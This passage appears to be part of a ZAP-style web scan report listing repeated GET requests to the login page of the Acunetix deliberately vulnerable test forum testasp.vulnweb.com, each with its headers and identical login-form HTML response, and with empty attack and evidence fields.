style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
